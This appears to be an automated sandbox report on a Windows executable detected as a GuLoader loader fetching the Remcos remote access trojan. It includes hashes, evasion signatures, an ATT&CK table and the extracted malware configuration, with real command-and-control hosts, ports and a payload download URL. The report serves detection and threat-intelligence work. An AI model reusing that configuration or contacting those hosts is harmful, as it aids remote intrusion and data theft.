
Windows Analysis Report DW1VgsgHNU.exe

Overview

General Information

Sample Name: DW1VgsgHNU.exe
Analysis ID: 491400
MD5: b30b9c1d23026ff24f234a07a557dc83
SHA1: 044ceea8b2fb554e2fdd7bcf4d695dded3a58d3b
SHA256: c54b1a3af48ef7f70434b9e90c33b4bcdccfbd20339d8164e34957890c67f888
Tags: exe, RemcosRAT

Detection

GuLoader Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Yara detected Remcos RAT
Yara detected GuLoader
Hides threads from debuggers
Tries to detect Any.run
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Uses dynamic DNS services
Uses 32bit PE files
Sample file is different than original file name gathered from version info
PE file contains strange resources
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Abnormal high CPU Usage

Classification

Process Tree

  • System is w10x64
  • DW1VgsgHNU.exe (PID: 6420 cmdline: 'C:\Users\user\Desktop\DW1VgsgHNU.exe' MD5: B30B9C1D23026FF24F234A07A557DC83)
    • DW1VgsgHNU.exe (PID: 2800 cmdline: 'C:\Users\user\Desktop\DW1VgsgHNU.exe' MD5: B30B9C1D23026FF24F234A07A557DC83)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "dyn-wave.duckdns.org:1144:1dyn-wave.duckdns.org:2404:0", "Assigned name": "RemoteHost_NEW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-2LBKGP", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Threatname: GuLoader

{"Payload URL": "http://dypage.duckdns.org/remcos_d_QUBXVO174"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000001.00000002.499884696.00000000005A0000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: DW1VgsgHNU.exe PID: 2800 | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

        Sigma Overview

        No Sigma rule has matched

        Jbx Signature Overview

        AV Detection:

        Found malware configuration
        Source: 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "dyn-wave.duckdns.org:1144:1dyn-wave.duckdns.org:2404:0", "Assigned name": "RemoteHost_NEW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-2LBKGP", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}
        Source: 00000001.00000002.499884696.00000000005A0000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "http://dypage.duckdns.org/remcos_d_QUBXVO174"}
        Multi AV Scanner detection for submitted file
        Source: DW1VgsgHNU.exe | Virustotal: Detection: 20%
        Yara detected Remcos RAT
        Source: Yara match | File source: 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: DW1VgsgHNU.exe PID: 2800, type: MEMORYSTR
        Machine Learning detection for sample
        Source: DW1VgsgHNU.exe | Joe Sandbox ML: detected
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Code function: 1_2_00402520 CryptDestroyHash,1_2_00402520
        Source: DW1VgsgHNU.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

        Networking:

        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractor | URLs: dyn-wave.duckdns.org
        Source: Malware configuration extractor | URLs: http://dypage.duckdns.org/remcos_d_QUBXVO174
        Uses dynamic DNS services
        Source: unknown | DNS query: name: dypage.duckdns.org
        Source: unknown | DNS query: name: dyn-wave.duckdns.org
        Source: global traffic | HTTP traffic detected: GET /remcos_d_QUBXVO174.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: dypage.duckdns.org Cache-Control: no-cache
        Source: global traffic | TCP traffic: 192.168.2.7:49893 -> 23.146.241.70:1144
        Source: Joe Sandbox View | ASN Name: VDI-NETWORKUS VDI-NETWORKUS
        Source: Joe Sandbox View | ASN Name: VDI-NETWORKUS VDI-NETWORKUS
        Source: Joe Sandbox View | IP Address: 23.146.242.85 23.146.242.85
        Source: DW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp | String found in binary or memory: http://dypage.duckdns.org/remcos_d_QUBXVO174.bin
        Source: DW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp | String found in binary or memory: http://dypage.duckdns.org/remcos_d_QUBXVO174.binD
        Source: DW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp | String found in binary or memory: http://dypage.duckdns.org/remcos_d_QUBXVO174.binE
        Source: unknown | DNS traffic detected: queries for: dypage.duckdns.org
        Source: global traffic | HTTP traffic detected: GET /remcos_d_QUBXVO174.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: dypage.duckdns.org Cache-Control: no-cache

        E-Banking Fraud:

        Yara detected Remcos RAT
        Source: Yara match | File source: 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: DW1VgsgHNU.exe PID: 2800, type: MEMORYSTR

        System Summary:

        Potential malicious icon found
        Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
        Source: DW1VgsgHNU.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: DW1VgsgHNU.exe, 00000001.00000000.242528368.000000000042D000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameSrklasse4.exe vs DW1VgsgHNU.exe
        Source: DW1VgsgHNU.exe, 00000019.00000000.498515700.000000000042D000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameSrklasse4.exe vs DW1VgsgHNU.exe
        Source: DW1VgsgHNU.exe | Binary or memory string: OriginalFilenameSrklasse4.exe vs DW1VgsgHNU.exe
        Source: DW1VgsgHNU.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Code function: 25_2_0056EED3 Sleep,NtProtectVirtualMemory,25_2_0056EED3
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Code function: 25_2_0056ED3B NtProtectVirtualMemory,25_2_0056ED3B
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Code function: 25_2_0056EDD4 NtProtectVirtualMemory,25_2_0056EDD4
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Code function: 25_2_0056ED50 NtProtectVirtualMemory,25_2_0056ED50
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Code function: 25_2_0056EF19 NtProtectVirtualMemory,25_2_0056EF19
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Code function: 25_2_0056ED2E NtProtectVirtualMemory,25_2_0056ED2E
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Process Stats: CPU usage > 98%
        Source: DW1VgsgHNU.exe | Virustotal: Detection: 20%
        Source: DW1VgsgHNU.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: unknown | Process created: C:\Users\user\Desktop\DW1VgsgHNU.exe 'C:\Users\user\Desktop\DW1VgsgHNU.exe'
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Process created: C:\Users\user\Desktop\DW1VgsgHNU.exe 'C:\Users\user\Desktop\DW1VgsgHNU.exe'
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Process created: C:\Users\user\Desktop\DW1VgsgHNU.exe 'C:\Users\user\Desktop\DW1VgsgHNU.exe'
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Mutant created: \Sessions\1\BaseNamedObjects\Remcos-2LBKGP
        Source: classification engine | Classification label: mal100.rans.troj.evad.winEXE@3/0@2/2
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | File read: C:\Windows\System32\drivers\etc\hosts

        Data Obfuscation:

        Yara detected GuLoader
        Source: Yara match | File source: 00000001.00000002.499884696.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Code function: 1_2_00409ABA pushad ; iretd 1_2_00409ABB
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Code function: 1_2_00407B13 push ecx; retf 1_2_00407B14
        Source: initial sample | Static PE information: section name: .text entropy: 6.92804161947
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Tries to detect Any.run
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | File opened: C:\Program Files\qga\qga.exe
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | File opened: C:\Program Files\qga\qga.exe
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Last function: Thread delayed
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | System information queried: ModuleInformation
        Source: DW1VgsgHNU.exe, 00000019.00000002.767758753.00000000009A1000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
        Source: DW1VgsgHNU.exe, 00000019.00000002.767758753.00000000009A1000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW,

        Anti Debugging:

        Hides threads from debuggers
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Thread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Thread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exe | Process created: C:\Users\user\Desktop\DW1VgsgHNU.exe 'C:\Users\user\Desktop\DW1VgsgHNU.exe'
        Source: DW1VgsgHNU.exe, 00000019.00000002.768074297.0000000000ED0000.00000002.00020000.sdmp | Binary or memory string: uProgram Manager
        Source: DW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp | Binary or memory string: Program Manager
        Source: DW1VgsgHNU.exe, 00000019.00000002.768074297.0000000000ED0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
        Source: DW1VgsgHNU.exe, 00000019.00000002.768074297.0000000000ED0000.00000002.00020000.sdmp | Binary or memory string: Progman
        Source: DW1VgsgHNU.exe, 00000019.00000002.768074297.0000000000ED0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
        Source: DW1VgsgHNU.exe, 00000019.00000002.767758753.00000000009A1000.00000004.00000020.sdmp | Binary or memory string: |Program Manager|
        Source: DW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp | Binary or memory string: Program ManagerY

        Stealing of Sensitive Information:

        GuLoader behavior detected
        Source: Initial file | Signature Results: GuLoader behavior
        Yara detected Remcos RAT
        Source: Yara match | File source: 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: DW1VgsgHNU.exe PID: 2800, type: MEMORYSTR

        Remote Access Functionality:

        Yara detected Remcos RAT
        Source: Yara match | File source: 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: DW1VgsgHNU.exe PID: 2800, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection 12 | Virtualization/Sandbox Evasion 2 | OS Credential Dumping | Security Software Discovery 21 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 12 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 2 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | System Information Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 212 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        DW1VgsgHNU.exe | 20% | Virustotal |
        DW1VgsgHNU.exe | 100% | Joe Sandbox ML |

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        Source | Detection | Scanner | Label
        http://dypage.duckdns.org/remcos_d_QUBXVO174.bin | 0% | Avira URL Cloud | safe
        dyn-wave.duckdns.org | 0% | Avira URL Cloud | safe
        http://dypage.duckdns.org/remcos_d_QUBXVO174.binE | 0% | Avira URL Cloud | safe
        http://dypage.duckdns.org/remcos_d_QUBXVO174.binD | 0% | Avira URL Cloud | safe
        http://dypage.duckdns.org/remcos_d_QUBXVO174 | 0% | Avira URL Cloud | safe

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        dypage.duckdns.org | 23.146.242.85 | true | true | | unknown
        dyn-wave.duckdns.org | 23.146.241.70 | true | true | | unknown

            Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://dypage.duckdns.org/remcos_d_QUBXVO174.bin | false | Avira URL Cloud: safe | unknown
            dyn-wave.duckdns.org | true | Avira URL Cloud: safe | unknown
            http://dypage.duckdns.org/remcos_d_QUBXVO174 | true | Avira URL Cloud: safe | unknown

            URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://dypage.duckdns.org/remcos_d_QUBXVO174.binE | DW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
            http://dypage.duckdns.org/remcos_d_QUBXVO174.binD | DW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown

            Contacted IPs

            Public

            IP | Domain | Country | ASN | ASN Name | Malicious
            23.146.241.70 | dyn-wave.duckdns.org | Reserved | 46664 | VDI-NETWORKUS | true
            23.146.242.85 | dypage.duckdns.org | Reserved | 46664 | VDI-NETWORKUS | true

            General Information

            Joe Sandbox Version: 33.0.0 White Diamond
            Analysis ID: 491400
            Start date: 27.09.2021
            Start time: 14:52:48
            Joe Sandbox Product: CloudBasic
            Overall analysis duration: 0h 8m 40s
            Hypervisor based Inspection enabled: false
            Report type: full
            Sample file name: DW1VgsgHNU.exe
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed: 29
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Detection: MAL
            Classification: mal100.rans.troj.evad.winEXE@3/0@2/2
            EGA Information: Failed
            HDC Information:
            • Successful, ratio: 73.1% (good quality ratio 35.6%)
            • Quality average: 25.5%
            • Quality standard deviation: 32.4%
            HCA Information: Failed
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            • Override analysis time to 240s for sample files taking high CPU consumption
            Warnings:
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
            • Excluded IPs from analysis (whitelisted): 23.54.113.53, 95.100.54.203, 20.82.209.183, 20.54.110.249, 40.112.88.60, 23.10.249.26, 23.10.249.43, 20.82.210.154
            • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
            • Not all processes were analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            No simulations

            Joe Sandbox View / Context

            IPs

              Match | Associated Sample Name / URL | Detection | Context
              23.146.241.70 | 7HHrcwZjLI.exe | malicious |
              23.146.242.85 | 7HHrcwZjLI.exe | malicious | dypage.duckdns.org/remcos_d_QUBXVO174.bin
              23.146.242.85 | 466XoziOLD.exe | malicious | sopage.duckdns.org/Remcos_s_bChlcwVW46.bin
              23.146.242.85 | hVlpEajflR.exe | malicious | spage.duckdns.org/Remcos_S_tGNeLX139.bin
              23.146.242.85 | 0rUkHCgvVf.exe | malicious | dpage.duckdns.org/remcos_d_fIqfwC80.bin
              23.146.242.85 | JQPFEy9Ekx.exe | malicious | dyn-bin.duckdns.org/remcos_d_fIqfwC80.bin
              23.146.242.85 | http___sowork.duckdns.org_11d_solex.exe | malicious | sol-bin.duckdns.org/Remcos_S_tGNeLX139.bin

              Domains

              Match | Associated Sample Name / URL | Detection | Context
              dypage.duckdns.org | 7HHrcwZjLI.exe | malicious | 23.146.242.85
              dyn-wave.duckdns.org | 7HHrcwZjLI.exe | malicious | 23.146.241.70

              ASN

              Match | Associated Sample Name / URL | Detection | Context
              VDI-NETWORKUS | 7HHrcwZjLI.exe | malicious | 23.146.242.85
              VDI-NETWORKUS | 466XoziOLD.exe | malicious | 23.146.242.85
              VDI-NETWORKUS | hVlpEajflR.exe | malicious | 23.146.242.85
              VDI-NETWORKUS | 0rUkHCgvVf.exe | malicious | 23.146.242.85
              VDI-NETWORKUS | HxXHmM0T9f.exe | malicious | 23.146.242.147
              VDI-NETWORKUS | JQPFEy9Ekx.exe | malicious | 23.146.242.85
              VDI-NETWORKUS | http___sowork.duckdns.org_11d_solex.exe | malicious | 23.146.242.85
              VDI-NETWORKUS | eXik5mFvet.exe | malicious | 23.146.242.94
              VDI-NETWORKUS | CVEXzxk43s.exe | malicious | 23.146.242.94
              VDI-NETWORKUS | yOCBr7SNLJ.exe | malicious | 23.146.242.94
              VDI-NETWORKUS | 13FlI4deWN.exe | malicious | 23.146.242.94
              VDI-NETWORKUS | Payment Notification.exe | malicious | 23.146.242.147
              VDI-NETWORKUS | Payment Notification.scr.exe | malicious | 23.146.242.147
              VDI-NETWORKUS | Payment Notification.scr.exe | malicious | 23.146.242.147
              VDI-NETWORKUS | Request For Quotation.jar | malicious | 23.146.242.147
              VDI-NETWORKUS | OvBS76pTyX.exe | malicious | 23.146.242.94
              VDI-NETWORKUS | U6lqJJBG8S.exe | malicious | 23.146.242.94
              VDI-NETWORKUS | pNyAinWdWJ.exe | malicious | 23.146.242.94
              VDI-NETWORKUS | YTVrQC7FhG.exe | malicious | 23.146.242.94
              VDI-NETWORKUS | I4eRfFgJG7.exe | malicious | 23.146.242.94

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type: PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit): 6.693618961961531
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.15%
              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name: DW1VgsgHNU.exe
              File size: 184320
              MD5: b30b9c1d23026ff24f234a07a557dc83
              SHA1: 044ceea8b2fb554e2fdd7bcf4d695dded3a58d3b
              SHA256: c54b1a3af48ef7f70434b9e90c33b4bcdccfbd20339d8164e34957890c67f888
              SHA512: 80f9e5c0df30a6937450a35531b5be188c98a911703c30064575b1f6707ebeed98643f0166e689fa54ee5e17c232b9825fcdc6d13cb62ad89f22ef6883124bc3
              SSDEEP: 3072:aTN6q3h21LWcznBUcxYIBpafjJJUB/yu0d/eWjUUqdj/WHA:aTyttVBwbbGyjeWjp
              File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....xH.....................0......`.............@................

              File Icon

              Icon Hash: 20047c7c70f0e004

              Static PE Info

              General

              Entrypoint: 0x401460
              Entrypoint Section: .text
              Digitally signed: false
              Imagebase: 0x400000
              Subsystem: windows gui
              Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp: 0x487895E2 [Sat Jul 12 11:30:42 2008 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major: 4
              OS Version Minor: 0
              File Version Major: 4
              File Version Minor: 0
              Subsystem Version Major: 4
              Subsystem Version Minor: 0
              Import Hash: 831c9926df4754b736e1ca092f4fb7e7

              Entrypoint Preview


              Data Directories

              | Name | Virtual Address | Virtual Size | Is in Section |
              |---|---|---|---|
              | IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2a214 | 0x28 | .text |
              | IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2d000 | 0xbea | .rsrc |
              | IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 | |
              | IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x198 | .text |
              | IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

              Sections

              | Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
              |---|---|---|---|---|---|---|---|---|
              | .text | 0x1000 | 0x29864 | 0x2a000 | False | 0.506946382068 | data | 6.92804161947 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
              | .data | 0x2b000 | 0x11e8 | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
              | .rsrc | 0x2d000 | 0xbea | 0x1000 | False | 0.253173828125 | data | 3.21209329916 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

              Resources

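              | Name | RVA | Size | Type | Language | Country |
              |---|---|---|---|---|---|
              | CUSTOM | 0x2d990 | 0x25a | ASCII text, with CRLF line terminators | English | United States |
              | RT_ICON | 0x2d860 | 0x130 | data | | |
              | RT_ICON | 0x2d578 | 0x2e8 | data | | |
              | RT_ICON | 0x2d450 | 0x128 | GLS_BINARY_LSB_FIRST | | |
              | RT_GROUP_ICON | 0x2d420 | 0x30 | data | | |
              | RT_VERSION | 0x2d1a0 | 0x280 | data | English | United States |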

              Imports

              | DLL | Import |
              |---|---|
